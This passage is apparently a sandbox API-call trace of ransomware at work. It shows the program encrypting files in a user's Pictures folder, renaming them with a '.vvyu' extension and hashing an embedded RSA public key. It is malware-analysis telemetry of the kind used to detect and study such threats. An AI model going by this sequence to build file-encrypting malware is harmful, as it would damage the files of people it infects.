hHeap=0x2c0000) returned 1 [0190.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0190.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0190.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0190.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5eb8 | out: hHeap=0x2c0000) returned 1 [0190.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0190.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0190.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0190.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0190.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0190.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0190.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0190.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0190.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0190.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0190.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f30 | out: hHeap=0x2c0000) returned 1 [0190.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f00 | out: hHeap=0x2c0000) returned 1 [0190.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ed0 | out: hHeap=0x2c0000) returned 1 [0190.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ee8 | out: hHeap=0x2c0000) returned 1 [0190.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0190.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0190.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0190.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3390 | out: hHeap=0x2c0000) returned 1 [0190.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0190.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0190.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0190.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0190.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0190.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0190.700] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x9e09, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x9e09, lpOverlapped=0x0) returned 1 [0190.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0190.701] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x9e0e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.701] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0190.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0190.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0190.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0190.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0190.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0190.703] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0190.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0190.703] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.703] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0190.703] CloseHandle (hObject=0x584) returned 1 [0190.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0190.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0190.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0190.705] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\HPPn3l0IweJl.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\hppn3l0iwejl.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\HPPn3l0IweJl.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\hppn3l0iwejl.gif.vvyu")) returned 1 [0190.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.717] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0190.721] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e94ed0, ftCreationTime.dwHighDateTime=0x1d89a89, ftLastAccessTime.dwLowDateTime=0xed445c40, ftLastAccessTime.dwHighDateTime=0x1d89cba, ftLastWriteTime.dwLowDateTime=0xed445c40, ftLastWriteTime.dwHighDateTime=0x1d89cba, nFileSizeHigh=0x0, nFileSizeLow=0xa990, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hyglyDuy.bmp", cAlternateFileName="")) returned 1 [0190.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3390 [0190.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0190.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3390 | out: hHeap=0x2c0000) returned 1 [0190.721] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\hyglyDuy.bmp") returned=".bmp" [0190.721] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\hyglyDuy.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\hyglyduy.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.724] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=43408) returned 1 [0190.724] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0190.728] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xa96a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.728] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0190.730] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.730] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xa990, lpOverlapped=0x0) returned 1 [0190.731] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0190.732] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.732] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.732] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0190.733] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0190.733] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.733] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0190.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0190.733] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0190.733] GetLastError () returned 0x0 [0190.733] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0190.733] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0190.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.734] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0190.734] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0190.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.734] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0190.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa990) returned 0x2af5168 [0190.735] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0190.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0190.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0190.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3390 [0190.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcb8 [0190.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af33d8 [0190.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ff348 [0190.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5eb8 [0190.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ed0 [0190.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ee8 [0190.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0190.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0190.736] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0190.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0190.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5eb8 | out: hHeap=0x2c0000) returned 1 [0190.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ee8 | out: hHeap=0x2c0000) returned 1 [0190.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ed0 | out: hHeap=0x2c0000) returned 1 [0190.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0190.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5eb8 [0190.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0190.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5ed0 [0190.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0190.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae5ee8 [0190.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0190.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0190.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0190.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0190.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0190.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0190.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0190.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0190.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ed0 | out: hHeap=0x2c0000) returned 1 [0190.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ee8 | out: hHeap=0x2c0000) returned 1 [0190.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5eb8 | out: hHeap=0x2c0000) returned 1 [0190.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0190.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0190.739] GetCurrentThreadId () returned 0x5d8 [0190.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0190.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae51d8 [0190.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0190.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0190.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0190.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0190.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0190.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.740] GetCurrentThreadId () returned 0x5d8 [0190.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0190.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0190.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0190.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0190.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0190.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0190.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5eb8 [0190.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0190.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0190.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0190.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0190.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0190.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0190.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ed0 [0190.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0190.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0190.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0190.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0190.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0190.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5ee8 [0190.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0190.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0190.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0190.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f00 [0190.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0190.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f18 [0190.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0190.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.743] RtlAllocateHeap (HeapHandle=0x2c0000, 